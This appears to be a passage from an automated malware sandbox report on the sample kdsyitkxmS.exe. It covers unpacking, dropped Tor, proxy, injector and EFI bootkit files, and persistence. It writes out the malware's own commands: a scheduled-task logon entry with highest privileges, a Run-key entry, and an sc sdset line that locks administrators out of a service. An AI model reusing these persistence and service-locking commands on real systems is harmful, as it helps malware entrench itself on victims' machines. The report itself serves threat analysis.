Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Unable to locate the .pdb file in this location source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
Source: Binary string: The module signature does not match with .pdb signature. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: .pdb.dbg source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: '(EfiGuardDxe.pdbx source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ZZC:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: System.Management.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
Source: Binary string: System.Management.ni.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: or you do not have access permission to the .pdb location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Transactions.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Transactions.ni.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: C:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: System.Numerics.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: System.Core.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\kdsyitkxmS.exe Unpacked PE file: 4.2.kdsyitkxmS.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Unpacked PE file: 10.2.kdsyitkxmS.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 20.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 23.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 31.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 40.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 43.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 50.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 55.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 58.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 61.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Code function: 20_3_0C4841B0 push eax; retf 20_3_0C4841B1
Source: injector.exe.20.dr Static PE information: section name: _RDATA
Source: NtQuerySystemInformationHook.dll.20.dr Static PE information: section name: _RDATA
Source: zlib1.dll.20.dr Static PE information: section name: /4
Source: tor.exe.20.dr Static PE information: section name: /4
Source: tor-gencert.exe.20.dr Static PE information: section name: /4
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /4
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /14
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /29
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /41
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /55
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /67
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /78
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /89
Source: libssp-0.dll.20.dr Static PE information: section name: /4
Source: libssp-0.dll.20.dr Static PE information: section name: /14
Source: libssp-0.dll.20.dr Static PE information: section name: /29
Source: libssp-0.dll.20.dr Static PE information: section name: /41
Source: libssp-0.dll.20.dr Static PE information: section name: /55
Source: libssp-0.dll.20.dr Static PE information: section name: /67
Source: libssp-0.dll.20.dr Static PE information: section name: /80
Source: libssp-0.dll.20.dr Static PE information: section name: /91
Source: libssp-0.dll.20.dr Static PE information: section name: /102
Source: libssl-1_1.dll.20.dr Static PE information: section name: /4
Source: libssl-1_1.dll.20.dr Static PE information: section name: /14
Source: libssl-1_1.dll.20.dr Static PE information: section name: /29
Source: libssl-1_1.dll.20.dr Static PE information: section name: /41
Source: libssl-1_1.dll.20.dr Static PE information: section name: /55
Source: libssl-1_1.dll.20.dr Static PE information: section name: /67
Source: libssl-1_1.dll.20.dr Static PE information: section name: /80
Source: libssl-1_1.dll.20.dr Static PE information: section name: /91
Source: libssl-1_1.dll.20.dr Static PE information: section name: /102
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /4
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /14
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /29
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /41
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /55
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /67
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /80
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /91
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /102
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /4
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /14
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /29
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /41
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /55
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /67
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /80
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /91
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /102
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /4
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /14
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /29
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /41
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /55
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /67
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /80
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /91
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /102
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /4
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /14
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /29
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /41
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /55
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /67
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /80
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /91
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /102
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /4
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /14
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /29
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /41
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /55
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /67
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /80
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /91
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /102
Source: proxy.exe.20.dr Static PE information: section name: .symtab
Source: bootmgfw.efi.20.dr Static PE information: section name: .xdata
Source: bootx64.efi.20.dr Static PE information: section name: .xdata
Source: EfiGuardDxe.efi.20.dr Static PE information: section name: .xdata
Source: bootx64.efi.20.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: NtQuerySystemInformationHook.dll.20.dr Static PE information: real checksum: 0x0 should be: 0x2279d
Source: csrss.exe.10.dr Static PE information: real checksum: 0x435435 should be: 0x4373eb
Source: bootmgfw.efi.20.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: EfiGuardDxe.efi.20.dr Static PE information: real checksum: 0x4a5a6 should be: 0x51a75
Source: proxy.exe.20.dr Static PE information: real checksum: 0x0 should be: 0x70e262
Source: kdsyitkxmS.exe Static PE information: real checksum: 0x435435 should be: 0x4373eb
Source: injector.exe.20.dr Static PE information: real checksum: 0x0 should be: 0x54ea2

Persistence and Installation Behavior

Source: C:\Windows\System32\netsh.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub
Source: C:\Windows\System32\fodhelper.exe Executable created and started: C:\Windows\rss\csrss.exe
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File created: C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi
Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Boot\old.efi (copy)
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_extra-2-1-7.dll
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libssp-0.dll
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_core-2-1-7.dll
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libssl-1_1.dll
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libgcc_s_dw2-1.dll
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\zlib1.dll
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor-gencert.exe
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libwinpthread-1.dll
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libcrypto-1_1.dll
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Microsoft\Boot\fw.efi (copy)

Boot Survival

Source: C:\Users\user\Desktop\kdsyitkxmS.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
